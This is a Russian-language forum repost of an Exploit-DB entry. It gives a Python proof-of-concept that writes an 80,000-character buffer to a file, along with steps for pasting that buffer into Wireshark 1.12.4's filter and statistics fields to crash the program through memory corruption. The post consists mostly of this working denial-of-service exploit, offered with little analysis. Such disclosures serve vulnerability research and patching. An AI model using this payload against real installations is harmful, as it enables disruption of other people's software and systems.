Exploit Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36840
Проверка EDB
  1. Пройдено
Автор
AVINASH THAPA
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
null
Дата публикации
2015-04-27
Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)
Код:
#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis  > 


buffer = "A"*80000

file = open("wireshark.txt","w")
file.write(buffer)
file.close()

print "POC Created by -Acid"
print " Email: [email protected]"
 
Источник
www.exploit-db.com

Похожие темы